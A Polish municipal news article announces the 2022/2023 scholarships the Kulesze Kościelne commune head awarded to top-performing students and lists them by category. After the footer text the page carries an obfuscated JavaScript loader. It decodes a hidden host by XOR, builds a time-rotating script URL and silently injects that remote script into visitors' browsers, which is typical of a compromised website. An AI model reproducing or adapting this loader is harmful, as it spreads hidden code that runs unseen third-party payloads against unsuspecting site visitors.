Aktualności

Wręczenie stypendiów Wójta Gminy Kulesze Kościelne za rok szkolny 2022/ 2023 najbardziej uzdolnionym uczniom osiągającym wysokie wyniki w nauce oraz szczególne osiągnięcia sportowe i artystyczne.

paź 17, 2023 | Aktualności

W dniu 13 października 2023 r.  w ramach obchodów Dnia Edukacji Narodowej Wójt Gminy Kulesze Kościelne Stefan Grodzki wręczył najbardziej uzdolnionym uczniom osiągającym wysokie wyniki w nauce oraz szczególne osiągnięcia sportowe i artystyczne stypendia za rok szkolny 2022/2023.

Za szczególne osiągnięcia w nauce w roku szkolnym 2022/2023 stypendium otrzymali  uczniowie, którzy uzyskali w ubiegłym roku szkolnym średnią ocen  nie niższą niż: w przypadku uczniów klas IV-VI – 5,50,  w przypadku uczniów klas VII-VIII – 5,20 lub uzyskali tytuł  laureata lub finalisty konkursów lub olimpiad przedmiotowych o zasięgu co najmniej wojewódzkim:

  1. Hubert Drużyński,
  2. Julia Zielińska,
  3. Antoni Grodzki,
  4. Kamil Sienicki,
  5. Weronika Choińska,

Za szczególne osiągnięcia sportowe w roku szkolnym 2022/2023 stypendium otrzymali uczniowie którzy spełnili jedno z następujących kryteriów: zajęli  medalowe miejsce (1-3) w zawodach sportowych na szczeblu wojewódzkim lub  czołowe miejsce (1-6) w zawodach sportowych na szczeblu centralnym/ogólnopolskim:

  1. Julia Zielińska
  2. Antoni Grodzki
  3. Hubert Gierałtowski 
  4. Oskar Choiński

Za szczególne osiągnięcia artystyczne w roku szkolnym 2022/2023 stypendium  otrzymała uczennica, która spełniła wymagane kryteria tj. zajęła I miejsce w ogólnopolskim konkursie plastycznym oraz  posiada celującą ocenę z przedmiotów artystycznych:

  1. Łucja Sokołowska 

Przyznane stypendia z pewnością przyczynią się do jeszcze bardziej wytężonej pracy, a dla pozostałych uczniów będą mobilizacją do osiągnięcia sukcesu rówieśników.

Gratulujemy stypendystom i życzymy kolejnych sukcesów.

Stypendystom towarzyszyli rodzice, którzy z rąk Wójta otrzymali gratulacje i podziękowania za włożoną pracę w wychowanie  i wspieranie zamiłowań do rozwijania zainteresowań, zdobywania wiedzy i umiejętności.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);